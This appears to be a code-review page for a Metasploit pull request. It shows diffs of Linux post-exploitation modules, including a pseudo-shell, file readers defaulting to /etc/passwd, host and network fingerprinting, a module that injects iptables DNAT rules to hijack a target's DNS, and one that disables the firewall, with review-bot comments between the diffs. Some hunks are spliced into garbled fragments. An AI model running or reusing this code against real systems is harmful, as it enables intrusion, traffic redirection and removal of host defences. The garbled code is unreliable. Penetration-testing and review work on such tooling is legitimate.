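Review bot: The two branches of `read_file` quote the path differently: the `cat` branch runs `cat \"#{file_name}\"` while the new fallback runs `done <#{file_name}` with the name bare, so the same path containing a space or a shell metacharacter reads correctly on a system with `cat` and is split or interpreted on one without it. The fallback also inherits the unquoted `echo $line` loop already flagged on the vpef_core_common.rb hunk, so the two branches return different bytes for lines with glob characters, backslashes or runs of whitespace. Quoting both makes the branches equivalent: `data = session.shell_command_token("while IFS= read -r line; do printf '%s\\n' \"$line\"; done < \"#{file_name}\"")`.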
@@ -1,68 +0,0 @@ -# -*- coding: binary -*- -require 'msf/core' - -module Msf -class Post -module Linux -module Pepa - - include ::Msf::Post::Common - include ::Msf::Post::File - - def pepa_ls(d) - result = pepa_list_directory(d) - return result - end - - def pepa_cat(f) - result = pepa_read_file(f) - return result - end - - def pepa_pwd() - result = [] - str_pwd = cmd_exec("echo $PWD") - result.insert(-1,str_pwd) - return result - end - - def pepa_uniq(list) - uniq_list = [] - list.each do |elem| - if not uniq_list.include?(elem) - uniq_list.insert(-1, elem) - end - end - return uniq_list - end - - def pepa_whoami() - result = [] - shellpid = pepa_shell_pid() - statuspid = pepa_pid_uid(shellpid) - statuspid.each do |line| - split = line.split(":") - if split[0] == "Uid" - regex = /.*\s(.*)\s/ - useridtmp = split[1] - userid = useridtmp[regex, 1] - uid = userid.to_s - passwd = pepa_read_file("/etc/passwd") - passwd.each do |line| - parts = line.split(":") - uid_passwd = parts[2].to_s - user = parts[0].to_s - if uid_passwd == uid - result.insert(-1,user) - return result - end - end - end - end - return "Whoami function error" - end - -end # Pepa -end # Linux -end # Post -end # Msf diff --git a/lib/msf/core/post/linux/pepa/pepa_core_common.rb b/lib/msf/core/post/linux/pepa/pepa_core_common.rb deleted file mode 100644 index 580eee13647a..000000000000 --- a/lib/msf/core/post/linux/pepa/pepa_core_common.rb +++ /dev/null 
@@ -1,44 +0,0 @@ -# -*- coding: binary -*- -require 'msf/core' - -module Msf -class Post -module Linux -module Pepa - - include ::Msf::Post::Common - include ::Msf::Post::File - - def pepa_read_file(f) - result = [] - str_file = cmd_exec("while read line; do echo $line; done <#{f}") - parts = str_file.split("\n") - parts.each do |line| - line = line.strip() - result.insert(-1,line) - end - return result - end - - def pepa_list_directory(d) - result = [] - if d == "" - d = pepa_pwd()[0] + "/" - elsif d[-1] == '/' - d = d - else - d = d + "/" - end - str_ls = cmd_exec("for fn in #{d}*; do echo $fn; done") - parts = str_ls.split("\n") - parts.each do |line| - line = line.strip() - result.insert(-1,line) - end - return result - end - -end # Pepa -end # Linux -end # Post -end # Msf diff --git a/lib/msf/core/post/linux/pepa/pepa_core_fingerprinting.rb b/lib/msf/core/post/linux/pepa/pepa_core_fingerprinting.rb deleted file mode 100644 index 7a86755e121a..000000000000 --- a/lib/msf/core/post/linux/pepa/pepa_core_fingerprinting.rb +++ /dev/null 
@@ -1,147 +0,0 @@ -# -*- coding: binary -*- -require 'msf/core' - -module Msf -class Post -module Linux -module Pepa - - include ::Msf::Post::Common - include ::Msf::Post::File - - def pepa_users() - result = [] - str_users = cmd_exec("while read line; do echo $line; done 'Pseudo-Shell Post-Exploitation Module', + 'Description' => %q{ + This module will be for the run a Psudo-Shell. + }, + 'Author' => 'Alberto Rafael Rodriguez Iglesias ', + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'SessionTypes' => ['shell'] + ) + end + + def run + $vhostname = get_hostname + $vusername = whoami + prompt() + end + + def parse_cmd(cmd) + error = "" + parts = cmd.split(" ") + if parts.length() >= 1 + nargs = parts.length() - 1 + cmd = parts[0] + HELP_COMMANDS.each do |linea| + if linea[0] == cmd + func = linea[1] + if nargs >= 1 + if linea[2] == 1 + args = parts[1] + else + nargs = 0 + end + else + args = "" + end + return func, cmd, args, nargs + end + end + error = get_shell_name + message = error + ": " + cmd + ": Command not exist\n" + print message + return message + else + return error + end + end + + def help() + print "\n" + print "Commands Help\n" + print "==============\n" + print "\n" + printf("\t%-20s%-100s\n", "Command", "Description") + printf("\t%-20s%-100s\n", "-------", "-----------") + HELP_COMMANDS.each do |linea| + printf("\t%-20s%-100s\n", linea[0], linea[3]) + end + print "\n" + end + + def prompt_show() + promptshell = $vusername + "@" + $vhostname + ":" + pwd.strip() + "# " + comp = proc { |s| LIST.grep(/^#{Regexp.escape(s)}/) } + Readline.completion_append_character = " " + Readline.completion_proc = comp + input = Readline.readline(promptshell , true) + return nil if input.nil? 
+ input + end + + def prompt() + while input = prompt_show + break if input == "exit" + break if input == "exit " + begin + func, command, args, nargs = parse_cmd(input) + nargs = nargs.to_i + if command == "ls" + if nargs == 0 + nargs = nargs + 1 + ruta = pwd + args = ruta + end + end + if nargs > 0 + args = args.strip() + resultado = public_send("#{func}", "#{args}") + else + if input == "" + resultado = [] + resultado.insert(-1,"") + else + resultado = public_send("#{func}") + end + end + if !!resultado == resultado + if command == "isroot?" + print resultado ? "true\n" : "false\n" + end + else + if resultado.class == Array + puts resultado.join("\n") + else + if resultado.strip() != "" + print resultado.chomp() + "\n" + end + end + end + rescue # begin + next + end # begin + end + end +end diff --git a/modules/post/linux/pepa/pepa_cat.rb b/modules/post/linux/pepa/pepa_cat.rb deleted file mode 100644 index dd36f73ee965..000000000000 --- a/modules/post/linux/pepa/pepa_cat.rb +++ /dev/null @@ -1,36 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Post - include Msf::Post::File - include Msf::Post::Linux::Pepa - - def initialize - super( - 'Name' => 'PEPA Read File (cat without cat)', - 'Description' => %q{ - This module will be applied on a session connected to a shell. It will - extract content from a given file. - }, - 'Author' => 'Alberto Rafael Rodriguez Iglesias ', - 'License' => MSF_LICENSE, - 'Platform' => ['linux'], - 'SessionTypes' => ['shell'] - ) - register_options( - [ - OptString.new('FILENAME', [true, 'File path to read, default /etc/passwd','/etc/passwd']) - ]) - end - - def run - file = datastore['FILENAME'] - print_status("Doing cat without cat command in FILENAME: #{file}") - cat_result=pepa_cat(file) - cat_result.each do |line| - print_line(line) - end - end -end 
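Review bot: The bare `rescue` closing the loop body in `prompt` does `next` with no output, so every StandardError raised while dispatching a command — a failure inside any helper, a nil `args` reaching `strip`, or the NoMethodError from `public_send` when `parse_cmd` returns its error String and the destructuring leaves `command`, `args` and `nargs` nil — is hidden and the operator just sees a new prompt; the unknown-command path works only because `parse_cmd` prints its message before the exception is swallowed. Report before continuing: `rescue StandardError => e`, `print_error(e.message)`, `next`. `HELP_COMMANDS` constrains the method names `public_send` can reach, but that table and the start of this hunk are garbled on this page, so the dispatch table itself could not be reviewed. The `$vhostname`/`$vusername` globals set in `run` would be instance variables in idiomatic Ruby.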
diff --git a/modules/post/linux/pepa/pepa_fingerprinting.rb b/modules/post/linux/pepa/pepa_fingerprinting.rb deleted file mode 100644 index 620c2f7aa38a..000000000000 --- a/modules/post/linux/pepa/pepa_fingerprinting.rb +++ /dev/null 
@@ -1,80 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Post - include Msf::Post::File - include Msf::Post::Linux::Pepa - - def initialize - super( - 'Name' => 'PEPA Fingerprinting Module', - 'Description' => %q{ - This module will be applied on a session connected to a shell. It will - extract different information from target system. - }, - 'Author' => 'Alberto Rafael Rodriguez Iglesias ', - 'License' => MSF_LICENSE, - 'Platform' => ['linux'], - 'SessionTypes' => ['shell'] - ) - end - - def run - print_status(" -- Session Information --") - print "Current Shell: " + pepa_shell()[0] - current_user = pepa_whoami()[0] - print "\nCurrent User: " + current_user - print "\nIs Current User root?: " + pepa_isroot?(current_user)[0] - print "\nCurrent Shell PID: " + pepa_shell_pid().to_s - print "\n" - print "\n" - - print_status(" -- System Information --") - print "Current PATH env ($PATH): " + pepa_path()[0] - print "\n" - print "\n" - - print_status(" -- Network Information --") - print "\n" - print_good("List of local IPs:") - ips = pepa_ips() - ips.each do |ip| - print "\n" + ip - end - - print "\n" - print "\n" - print_good("List of local network interfaces:") - ifaces = pepa_interfaces() - ifaces.each do |iface| - print "\n" + iface - end - - print "\n" - print "\n" - print_good("List of local MAC addresses:") - macs = pepa_macs() - macs.each do |mac| - print "\n" +mac - end - - print "\n" - print "\n" - print_good("List of listening TCP ports:") - tcp_ports = pepa_listen_tcp_ports() - tcp_ports.each do |tcp_port| - print "\n" + tcp_port.to_s - end - - print "\n" - print "\n" - print_good("List of listening UDP ports:") - udp_ports = pepa_listen_udp_ports() - udp_ports.each do |udp_port| - print udp_port.to_s + "\n" - end - print "\n" - end -end 
diff --git a/modules/post/linux/pepa/pepa_ls.rb b/modules/post/linux/pepa/pepa_ls.rb deleted file mode 100644 index dcd292026319..000000000000 --- a/modules/post/linux/pepa/pepa_ls.rb +++ /dev/null @@ -1,40 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Post - include Msf::Post::File - include Msf::Post::Linux::Pepa - - def initialize - super( - 'Name' => 'PEPA List Directory (ls without ls)', - 'Description' => %q{ - This module will be applied on a session connected to a shell. It will - extract a list of files and folders on a given dir. - }, - 'Author' => 'Alberto Rafael Rodriguez Iglesias ', - 'License' => MSF_LICENSE, - 'Platform' => ['linux'], - 'SessionTypes' => ['shell'] - ) - register_options( - [ - OptString.new('DIR', [false, 'Optional directory name to list, default current session path','']) - ]) - end - - def run - dir = datastore['DIR'] - if dir == "" - print_status("Doing ls without ls command in current session path DIR") - else - print_status("Doing ls without ls command in DIR: #{dir}") - end - ls_result=pepa_ls(dir) - ls_result.each do |line| - print_line(line) - end - end -end diff --git a/modules/post/linux/pepa/pepa_whoami.rb b/modules/post/linux/pepa/pepa_whoami.rb deleted file mode 100644 index f0df4534b20c..000000000000 --- a/modules/post/linux/pepa/pepa_whoami.rb +++ /dev/null 
@@ -1,29 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Post - include Msf::Post::File - include Msf::Post::Linux::Pepa - - def initialize - super( - 'Name' => 'PEPA Whoami (whoami without whoami)', - 'Description' => %q{ - This module will be applied on a session connected to a shell. It will - extract current username. - }, - 'Author' => 'Alberto Rafael Rodriguez Iglesias ', - 'License' => MSF_LICENSE, - 'Platform' => ['linux'], - 'SessionTypes' => ['shell'] - ) - end - - def run - print_status("Doing whoami without whoami command") - whoami_result=pepa_whoami()[0] - print_line(whoami_result) - end -end From 53e6faef2798a1739c560ca72849d2dde66a2863 Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Tue, 19 Jun 2018 12:50:18 +0200 Subject: [PATCH 05/21] Module description fixed --- modules/post/linux/manage/pseudo_shell.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/linux/manage/pseudo_shell.rb b/modules/post/linux/manage/pseudo_shell.rb index d6060d05e4ff..fcdb1b3b5825 100644 --- a/modules/post/linux/manage/pseudo_shell.rb +++ b/modules/post/linux/manage/pseudo_shell.rb @@ -45,7 +45,7 @@ def initialize super( 'Name' => 'Pseudo-Shell Post-Exploitation Module', 'Description' => %q{ - This module will be for the run a Psudo-Shell. + This module will run a Pseudo-Shell. }, 'Author' => 'Alberto Rafael Rodriguez Iglesias ', 'License' => MSF_LICENSE, From 667f6cb570c3d6f994eff2cc9b865fd3e649366f Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Tue, 19 Jun 2018 14:30:00 +0200 Subject: [PATCH 06/21] Some minor fixes in pseudo_shell module and priv.rb --- lib/msf/core/post/linux/priv.rb | 4 ++-- modules/post/linux/manage/pseudo_shell.rb | 10 +++++----- 2 files changed, 7 insertions(+), 7 deletions(-) 
diff --git a/lib/msf/core/post/linux/priv.rb b/lib/msf/core/post/linux/priv.rb
index 8eecd3277d1c..d55ac9003814 100644
--- a/lib/msf/core/post/linux/priv.rb
+++ b/lib/msf/core/post/linux/priv.rb
@@ -33,8 +33,8 @@ def is_root?
 data.each_line do |line|
 line = line.split(":")
 user_passwd = line[0]
- if user_passwd = user
- if line[1] = 0
+ if user_passwd == user
+ if line[3].to_i == 0
 found = true
 end
 end
diff --git a/modules/post/linux/manage/pseudo_shell.rb b/modules/post/linux/manage/pseudo_shell.rb
index fcdb1b3b5825..01a41cadb6e1 100644
--- a/modules/post/linux/manage/pseudo_shell.rb
+++ b/modules/post/linux/manage/pseudo_shell.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Post
 HELP_COMMANDS = [["help", "help", 0, "Show current help"],
 ["?", "help", 0, "Show current help"],
- ["ls", "dir", 1, "List files and folders in a directory"],
+ ["ls", "dir", 1, "List files and folders in a directory"],
 ["cat", "read_file", 1, "Show file contents"],
 ["whoami", "whoami", 0, "Show current user"],
 ["cd", "cd", 1, "Change current directory"],
@@ -74,7 +74,7 @@ def parse_cmd(cmd)
 args = parts[1]
 else
 nargs = 0
- end
+ end
 else
 args = ""
 end
@@ -101,7 +101,7 @@ def help()
 printf("\t%-20s%-100s\n", linea[0], linea[3])
 end
 print "\n"
- end
+ end

 def prompt_show()
 promptshell = $vusername + "@" + $vhostname + ":" + pwd.strip() + "# "
@@ -144,7 +144,7 @@ def prompt()
 end
 else
 if resultado.class == Array
- puts resultado.join("\n")
+ print resultado.join("\n")
 else
 if resultado.strip() != ""
 print resultado.chomp() + "\n"
@@ -152,7 +152,7 @@ def prompt()
 end
 end
 rescue # begin
- next
+ next
 end # begin
 end
 end
From 247437c8f3ce9b7a933272e903dbf41517b525f9 Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Thu, 21 Jun 2018 13:25:35 +0200 Subject: [PATCH 07/21] Change global variables to instance variables in pseudo_shell module and minor fix prompts's output --- modules/post/linux/manage/pseudo_shell.rb | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-)
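Review bot: The repaired comparison still tests the wrong /etc/passwd column: in `name:passwd:uid:gid:…` the index-3 field is the primary GID, so `line[3].to_i == 0` reports any account whose primary group is 0 as root and misses a uid-0 account with another primary group; the check belongs on the UID, `if line[2] == '0'`. `to_i` also maps a malformed or empty field to 0, which here is the privileged answer, so comparing the string fails safe where the integer conversion fails open. `is_root?` starts before this hunk, so how `data` and `user` are obtained is not visible here.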
diff --git a/modules/post/linux/manage/pseudo_shell.rb b/modules/post/linux/manage/pseudo_shell.rb index 01a41cadb6e1..db5ccd6fee48 100644 --- a/modules/post/linux/manage/pseudo_shell.rb +++ b/modules/post/linux/manage/pseudo_shell.rb @@ -38,8 +38,8 @@ class MetasploitModule < Msf::Post LIST.insert(-1, linea[0]) end -$vhostname = "" -$vusername = "" +@vhostname = "" +@vusername = "" def initialize super( @@ -55,8 +55,8 @@ def initialize end def run - $vhostname = get_hostname - $vusername = whoami + @vhostname = get_hostname + @vusername = whoami prompt() end @@ -104,7 +104,7 @@ def help() end def prompt_show() - promptshell = $vusername + "@" + $vhostname + ":" + pwd.strip() + "# " + promptshell = @vusername + "@" + @vhostname + ":" + pwd.strip() + "# " comp = proc { |s| LIST.grep(/^#{Regexp.escape(s)}/) } Readline.completion_append_character = " " Readline.completion_proc = comp @@ -145,6 +145,7 @@ def prompt() else if resultado.class == Array print resultado.join("\n") + print "\n" else if resultado.strip() != "" print resultado.chomp() + "\n" From 33e9d1abb064f4cf1437bc2115aecabdd828e91c Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Thu, 21 Jun 2018 13:56:32 +0200 Subject: [PATCH 08/21] clear_screen function added --- lib/msf/core/post/common.rb | 46 +++++++++++++++++++++++++++++++++---- 1 file changed, 41 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/post/common.rb b/lib/msf/core/post/common.rb index 90750e355033..47ea697b166b 100644 --- a/lib/msf/core/post/common.rb +++ b/lib/msf/core/post/common.rb @@ -2,6 +2,10 @@ module Msf::Post::Common + def clear_screen + Gem.win_platform? ? (system "cls") : (system "clear") + end + def rhost return nil unless session 
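Review bot: `@vhostname = ""` and `@vusername = ""` at class-body level are instance variables of the class object, not of the module instance, so `prompt_show` never sees them — it reads the instance-level ivars that `run` assigns — and the two lines are dead; dropping them leaves `run` as the single place the prompt state is set. If a default is wanted for the case where `prompt_show` runs before `run`, it belongs in `initialize` (outside this hunk). The `print "\n"` added after `print resultado.join("\n")` restores the newline the earlier `puts` → `print` change dropped; `puts resultado` alone would have done both.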
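Review bot: `clear_screen` runs `system "clear"` / `system "cls"` on the framework host, yet it is added to `Msf::Post::Common` next to `rhost` and `cmd_exec`, whose subject is the target session, and nothing says so; a one-line comment, `# Clears the local console (runs on the framework host, not in the session)`, keeps the next reader from treating it as a target-side action. The return value of `system` — `nil` when the program cannot be found, `false` on non-zero exit — is discarded, so a missing `clear` fails silently; returning it (`Gem.win_platform? ? system('cls') : system('clear')`) costs nothing.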
@@ -80,10 +84,31 @@ def has_pid?(pid) # # Returns a (possibly multi-line) String. # - def cmd_exec(cmd, args="", time_out=15) + def cmd_exec(cmd, args=nil, time_out=15) case session.type when /meterpreter/ + # + # The meterpreter API requires arguments to come separately from the + # executable path. This has no effect on Windows where the two are just + # blithely concatenated and passed to CreateProcess or its brethren. On + # POSIX, this allows the server to execve just the executable when a + # shell is not needed. Determining when a shell is not needed is not + # always easy, so it assumes anything with arguments needs to go through + # /bin/sh. + # + # This problem was originally solved by using Shellwords.shellwords but + # unfortunately, it is unsuitable. When a backslash occurs inside double + # quotes (as is often the case with Windows commands) it inexplicably + # removes them. So. Shellwords is out. + # + # By setting +args+ to an empty string, we can get POSIX to send it + # through /bin/sh, solving all the pesky parsing troubles, without + # affecting Windows. + # start = Time.now.to_i + if args.nil? and cmd =~ /[^a-zA-Z0-9\/._-]/ + args = "" + end session.response_timeout = time_out process = session.sys.process.execute(cmd, args, {'Hidden' => true, 'Channelized' => true}) @@ -99,6 +124,7 @@ def cmd_exec(cmd, args="", time_out=15) end end end + o.chomp! if o begin process.channel.close 
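Review bot: `if args.nil? and cmd =~ /[^a-zA-Z0-9\/._-]/` uses `and` for a boolean condition; `and` binds looser than `=` and is reserved for flow control, so this should be `&&` (and `cmd.match?(...)`, since the match data is unused). The behaviour change the long comment explains is invisible to callers of `cmd_exec`: with the default now `nil`, a command made only of `[a-zA-Z0-9/._-]` is presumably handed to execve without `/bin/sh`, so a bare shell builtin such as `cd` or `umask` has to be called as `cmd_exec('cd', '')` to reach a shell. That rule deserves one sentence in the method's doc comment above the hunk, e.g. `# On meterpreter, a bare command with no shell metacharacters is executed directly; pass args="" to force /bin/sh.` `cmd_exec` begins before this hunk.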
@@ -108,12 +134,22 @@ def cmd_exec(cmd, args="", time_out=15) process.close when /powershell/ - o = session.shell_command("#{cmd} #{args}", time_out) + if args.nil? || args.empty? + o = session.shell_command("#{cmd}", time_out) + else + o = session.shell_command("#{cmd} #{args}", time_out) + end + o.chomp! if o when /shell/ - o = session.shell_command_token("#{cmd} #{args}", time_out) + if args.nil? || args.empty? + o = session.shell_command_token("#{cmd}", time_out) + else + o = session.shell_command_token("#{cmd} #{args}", time_out) + end + o.chomp! if o end - - o ? o.chomp : "" + return "" if o.nil? + return o end def cmd_exec_get_pid(cmd, args=nil, time_out=15) From 5b60a91b6601ea6cea711dfeacbd3accd9e395f0 Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Thu, 12 Jul 2018 13:54:47 +0200 Subject: [PATCH 09/21] Style and code optimization changes --- lib/msf/core/post/file.rb | 72 +++++++++++------------ lib/msf/core/post/linux/priv.rb | 40 +++++-------- lib/msf/core/post/linux/system.rb | 25 +++----- lib/msf/core/post/unix.rb | 2 +- modules/post/linux/manage/pseudo_shell.rb | 46 +++++++-------- 5 files changed, 81 insertions(+), 104 deletions(-) diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb index a27b8eff92b4..69a417d5ebc7 100644 --- a/lib/msf/core/post/file.rb +++ b/lib/msf/core/post/file.rb 
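Review bot: `o.chomp! if o` is now repeated in all three session branches and followed by `return "" if o.nil?` / `return o`, where the single removed expression `o ? o.chomp : ""` already covered every branch; keeping that expression as the last line of the method removes the duplication and the explicit returns. `"#{cmd}"` is a redundant interpolation of a String — `cmd` alone (or `cmd.to_s` if non-strings are expected) reads the same. For `shell` and `powershell` sessions the command line is still `"#{cmd} #{args}"` joined with a space, so the new nil/empty check changes only trailing whitespace; callers passing operator-controlled paths remain responsible for quoting them, as `read_file` does and `dir` does not later in this series. `cmd_exec` starts before this hunk.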
@@ -48,28 +48,29 @@ def pwd def dir(directory) if session.type == 'meterpreter' return session.fs.dir.entries(directory) - else - if session.platform == 'windows' - return session.shell_command_token("dir #{directory}").split(/[\r\n]+/) - else - if command_exists?("ls") - return session.shell_command_token("ls #{directory}").split(/[\r\n]+/) - else - # Result on systems without ls command - if directory[-1] != '/' - directory = directory + "/" - end - result = [] - data = session.shell_command_token("for fn in #{directory}*; do echo $fn; done") - parts = data.split("\n") - parts.each do |line| - line = line.split("/")[-1] - result.insert(-1,line) - end - return result - end - end end + + if session.platform == 'windows' + return session.shell_command_token("dir #{directory}").split(/[\r\n]+/) + end + + if command_exists?('ls') + return session.shell_command_token("ls #{directory}").split(/[\r\n]+/) + end + + # Result on systems without ls command + if directory[-1] != '/' + directory = directory + "/" + end + result = [] + data = session.shell_command_token("for fn in #{directory}*; do echo $fn; done") + parts = data.split("\n") + parts.each do |line| + line = line.split("/")[-1] + result.insert(-1, line) + end + + result end alias ls dir 
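Review bot: The early-return rewrite keeps `directory` unquoted in `ls #{directory}`, `dir #{directory}` and `for fn in #{directory}*`, while `read_file` in the same commit quotes its path (`cat \"#{file_name}\"`), so the two helpers now disagree and a directory name containing a space or glob character lists something other than what was asked; `session.shell_command_token("ls \"#{directory}\"")` brings `dir` in line. With an empty `directory` the `ls` branch lists the current directory, but the fallback turns `''` into `'/'` (`''[-1]` is nil, so the `!= '/'` test appends the slash) and lists the root instead — the two branches should agree, e.g. by substituting `pwd` when `directory.to_s.empty?`. The fallback loop still builds `result` with `insert(-1, …)`; `data.split("\n").map { |line| line.split('/').last }` says the same in one line and matches the style the rest of the rewrite moves toward.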
@@ -294,23 +295,22 @@ def file_remote_digestsha2(file_name)
 # @return [Array] of strings(lines)
 #
 def read_file(file_name)
- data = nil
- if session.type == "meterpreter"
- data = _read_file_meterpreter(file_name)
- elsif session.type == "shell"
- if session.platform == 'windows'
- data = session.shell_command_token("type \"#{file_name}\"")
- else
- if command_exists?("cat")
- data = session.shell_command_token("cat \"#{file_name}\"")
- else
- # Result on systems without cat command
- data = session.shell_command_token("while read line; do echo $line; done <#{file_name}")
- end
- end
+ if session.type == 'meterpreter'
+ return _read_file_meterpreter(file_name)
+ end
+
+ return nil unless session.type == 'shell'
+ if session.platform == 'windows'
+ return session.shell_command_token("type \"#{file_name}\"")
 end
- data
+
+ if command_exists?('cat')
+ return session.shell_command_token("cat \"#{file_name}\"")
+ end
+
+ # Result on systems without cat command
+ session.shell_command_token("while read line; do echo $line; done <#{file_name}")
 end

 # Platform-agnostic file write. Writes given object content to a remote file.
diff --git a/lib/msf/core/post/linux/priv.rb b/lib/msf/core/post/linux/priv.rb
index d55ac9003814..a628db835964 100644
--- a/lib/msf/core/post/linux/priv.rb
+++ b/lib/msf/core/post/linux/priv.rb
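Review bot: The no-`cat` fallback `while read line; do echo $line; done <#{file_name}` alters the data it returns: `read` without `-r` strips backslashes, the unquoted `$line` collapses whitespace and expands globs, and `echo` may interpret `-n`/`-e` lines — a problem when this path reads configuration or credential files whose bytes matter. `file_name` is also left unquoted here although the `cat` branch directly above quotes it. A faithful one-liner is `session.shell_command_token("while IFS= read -r line; do printf '%s\\n' \"$line\"; done <\"#{file_name}\"")`. Separately, the `# @return [Array] of strings(lines)` tag in the context above the hunk does not match the String (or `nil`, for other session types) the method now returns.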
@@ -12,35 +12,23 @@ module Priv # @return [Boolean] # def is_root? - if command_exists?("id") - root_priv = false - user_id = cmd_exec("id -u") - clean_user_id = user_id.to_s.gsub(/[^\d]/,"") - unless clean_user_id.empty? - if clean_user_id =~ /^0$/ - root_priv = true - elsif clean_user_id =~ /^\d*$/ - root_priv = false - end - else + if command_exists?('id') + user_id = cmd_exec('id -u') + clean_user_id = user_id.to_s.gsub(/[^\d]/, '') + if clean_user_id.empty? raise "Could not determine UID: #{user_id.inspect}" end - return root_priv - else - user = whoami - found = false - data = cmd_exec("while read line; do echo $line; done = 1 - nargs = parts.length() - 1 - cmd = parts[0] - HELP_COMMANDS.each do |linea| - if linea[0] == cmd - func = linea[1] - if nargs >= 1 - if linea[2] == 1 - args = parts[1] - else - nargs = 0 - end - else - args = "" - end - return func, cmd, args, nargs + parts = cmd.split(' ') + return '' unless parts.length >= 1 + cmd = parts[0] + nargs = parts.length - 1 + HELP_COMMANDS.each do |linea| + next unless linea[0] == cmd + + func = linea[1] + if nargs >= 1 + if linea[2] == 1 + args = parts[1] + else + nargs = 0 end + else + args = '' end - error = get_shell_name - message = error + ": " + cmd + ": Command not exist\n" - print message - return message - else - return error + + return func, cmd, args, nargs end + + error = get_shell_name + message = "#{error}: #{cmd}: Command does not exist\n" + print message + message end def help() From 60becc272acb974b27cb0f57946a86f4508915af Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Thu, 12 Jul 2018 14:06:41 +0200 Subject: [PATCH 10/21] Native DNS Spoofing module added --- modules/post/linux/manage/dns_spoofing.rb | 35 +++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 modules/post/linux/manage/dns_spoofing.rb diff --git a/modules/post/linux/manage/dns_spoofing.rb b/modules/post/linux/manage/dns_spoofing.rb new file mode 100644 index 000000000000..d518a4a30cee 
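Review bot: `return '' unless parts.length >= 1` hands a plain String to a caller that destructures four values (`func, command, args, nargs = parse_cmd(input)` in `prompt`), and the not-found path returns `message` the same way, so `func` ends up as `''` or the error text and the following `public_send` only survives thanks to the bare `rescue` in `prompt`; returning four values on every path (`return nil, cmd, '', 0`) or raising a dedicated error makes the contract explicit. `args = parts[1]` keeps only the first word, so an argument containing a space is silently truncated; `parts[1..-1].join(' ')` preserves it. The hunk header and the first lines of `parse_cmd` are lost in this rendering, and `prompt` is outside the hunk.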
--- /dev/null
+++ b/modules/post/linux/manage/dns_spoofing.rb
@@ -0,0 +1,35 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+ include Msf::Post::File
+ include Msf::Post::Linux::System
+
+ def initialize
+ super(
+ 'Name' => 'Native DNS Spoofing module',
+ 'Description' => %q{
+ This module will be applied on a session connected to a shell. It will redirect DNS Request to remote DNS server.
+ },
+ 'Author' => 'Alberto Rafael Rodriguez Iglesias ',
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['linux'],
+ 'SessionTypes' => ['shell']
+ )
+ register_options(
+ [
+ OptString.new('ORIGIN_PORT', [true, 'Origin port','53']),
+ OptString.new('DESTINY_PORT', [true, 'Destination port','53']),
+ OptAddress.new('DESTINY_IP', [true, 'Needed','8.8.8.8'])
+ ])
+ end
+
+ def run
+ print_good("Spoofing DNS server...")
+ cmd_exec("iptables -t nat -A OUTPUT -p udp --dport #{datastore['ORIGIN_PORT']} -j DNAT --to #{datastore['DESTINY_IP']}:#{datastore['DESTINY_PORT']}")
+ cmd_exec("iptables -t nat -A OUTPUT -p tcp --dport #{datastore['ORIGIN_PORT']} -j DNAT --to #{datastore['DESTINY_IP']}:#{datastore['DESTINY_PORT']}")
+ print_good("Successfully exploited.")
+ end
+end
From 93413481e8e86c56c3330a02b355134d98240e61 Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Thu, 12 Jul 2018 14:16:22 +0200 Subject: [PATCH 11/21] IPTABLES rules removal module added --- modules/post/linux/manage/iptables_removal.rb | 44 +++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 modules/post/linux/manage/iptables_removal.rb
diff --git a/modules/post/linux/manage/iptables_removal.rb b/modules/post/linux/manage/iptables_removal.rb
new file mode 100644
index 000000000000..eacd4f0cd392
--- /dev/null
+++ b/modules/post/linux/manage/iptables_removal.rb
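Review bot: `ORIGIN_PORT` and `DESTINY_PORT` are `OptString` values interpolated verbatim into the `iptables` command line, so the module accepts and runs whatever the datastore holds; `OptPort.new('ORIGIN_PORT', [true, 'Origin port', 53])` (and the same for `DESTINY_PORT`) restricts them to valid port numbers before they reach `cmd_exec`. Both `cmd_exec` results are discarded and `print_good("Successfully exploited.")` is unconditional, so a missing `iptables` binary or a non-root session — there is no privilege check — is reported as success; checking `command_exists?('iptables')` and the command output first, as the sibling `iptables_removal` module does later in this series, would make the status honest. The rules are appended with `-A` on every run and nothing records or reverts them, so the target's NAT table accumulates entries with no cleanup path; the description should state that the change persists until removed by hand, and a revert option would be expected from a manage module. The `OptAddress` description `'Needed'` says nothing about the option — `'IP address of the DNS server to redirect to'` describes it.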
@@ -0,0 +1,44 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+ include Msf::Post::File
+ include Msf::Post::Linux::System
+
+ def initialize
+ super(
+ 'Name' => 'IPTABLES rules removal',
+ 'Description' => %q{
+ This module will be applied on a session connected to a shell. It will remove all IPTABLES rules.
+ },
+ 'Author' => 'Alberto Rafael Rodriguez Iglesias ',
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['linux'],
+ 'SessionTypes' => ['shell']
+ )
+ end
+
+ def run
+ print_good("Deleting IPTABLES rules...")
+ cmd_exec("iptables -P INPUT ACCEPT")
+ cmd_exec("iptables -P FORWARD ACCEPT")
+ cmd_exec("iptables -P OUTPUT ACCEPT")
+ cmd_exec("iptables -t nat -F")
